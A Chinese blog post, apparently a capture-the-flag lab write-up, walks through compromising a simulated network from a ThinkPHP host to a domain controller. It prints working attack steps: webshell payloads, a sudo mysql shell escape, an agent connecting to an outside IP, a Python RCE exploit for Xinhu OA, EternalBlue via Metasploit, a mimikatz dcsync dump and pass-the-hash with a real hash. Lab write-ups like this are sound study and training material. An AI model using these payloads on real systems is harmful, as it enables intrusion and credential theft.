本文最后更新于9 天前，其中的信息可能已经过时，如有错误请发送邮件到big_fw@foxmail.com

Pasted image 20250415211250.png

一、外网打点

1.信息收集

（1）端口扫描

使用Tscan进行扫描

发现开启了SSH和HTTP服务

（2）指纹识别

使用EHole进行识别
Pasted image 20250427200328.png

根据信息和图标可知是ThinkPHP

2.漏洞发现

使用工具进行探测，发现漏洞
Pasted image 20250427200934.png

3.漏洞利用

执行命令(因为getshell功能不行)

echo '<?php @eval($_POST["x"]); ?>' >shell.php

Pasted image 20250427201451.png

使用蚁剑连接，成功
Pasted image 20250427201534.png

执行whoami命令，查看权限

发现是www-data网站用户权限，需要提权

3.提权

使用命令，显示出自己(执行sudo的使用者)的权限

sudo -l

Pasted image 20250427201824.png

发现mysql可以提权，使用命令进行提权

sudo mysql -e '\! /bin/sh'

查找flag文件

sudo mysql -e '\! find / -name flag*'

发现/root/flag/flag01.txt文件

4.获取flag

sudo mysql -e '\! cat /root/flag/flag01.txt'

Pasted image 20250427202322.png

flag01: flag{60b53231-

二、内网渗透

查看内网IP
Pasted image 20250427202524.png

1.内网信息收集

使用fscan进行信息收集

sudo mysql -e '\! ./fscan -h 172.22.1.0/24'

Pasted image 20250427203212.png

172.22.1.21是个存在永恒之蓝的Win7
172.22.1.18是个信呼OA的系统
172.22.1.2是个域控

2.Socks代理搭建

使用Stowaway搭建代理
在攻击机上开启admin

./admin -l 9999

Pasted image 20250427203755.png

上传agent，赋予执行权限，在目标机器上启动agent

sudo mysql -e '\! ./agent -c 120.79.150.243:9999'

Pasted image 20250427203917.png

在节点0开启代理
Pasted image 20250427204039.png

在本地的浏览器代理插件配置代理，代理服务器为开启admin的
Pasted image 20250428181307.png

在浏览器访问内网IP，成功访问
Pasted image 20250427205107.png

在kali里配置proxychains的配置文件
Pasted image 20250428191651.png

在kali里访问内网
Pasted image 20250427205054.png

3.phpmyAdmin

进行目录扫描，发现phpmyadmin
Pasted image 20250427205443.png

爆破出密码是root/root
Pasted image 20250427212636.png

SQL写wedshell

第一步先执行show variables like 'general%';查看是否开启日志以及存放的日志位置
第二步set global general_log = ON;开启日志
第三步set global general_log_file='C:\\phpStudy\\PHPTutorial\\www\\shell.php'
设置日志保存位置
最后select '<?php eval($_POST[cmd]);?>';写入webshell

Pasted image 20250427214437.png

Pasted image 20250427214214.png

Pasted image 20250427214404.png

Pasted image 20250427214911.png

访问webshell，成功
Pasted image 20250427214857.png

4.信呼OA Nday

访问目标内网信呼OA成功
Pasted image 20250427205827.png

尝试出弱口令admin/admin123登录成功
Pasted image 20250427205907.png

后面查了一下发现信呼OA 存在一个RCE的漏洞
要准备一个1.php放在脚本相同的目录下，内容为一句话木马，内容为:<?=eval($_POST['1']);?>

import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

Pasted image 20250427211718.png

回显出来的就是写进去一句话木马的路径，访问路径就可以执行命令，然后在蚁剑上配置一下代理，如果不配的代理话蚁剑也是没法直接访问到内网的。
Pasted image 20250427211808.png

Pasted image 20250427212219.png

Pasted image 20250427212347.png

flag02: 2ce3-4813-87d4-

5.永恒之蓝攻击win

由前面的fscan扫描结果知道有ms17_010漏洞

使用msf的永恒之蓝模块获取system权限的meterpreter

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

Pasted image 20250427213533.png

加载 mimikatz

load kiwi

获取用户hash

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

Pasted image 20250427213700.png

6.横向移动

‍拿到所有用户的hash，172.22.1.2 的 445 端口开放，利用 smb 哈希传递，直接用 kali 自带的 crackmapexec攻击

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

Pasted image 20250427213752.png

flag03: e8f88d0d43d6}

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

成功攻克
Pasted image 20250427213955.png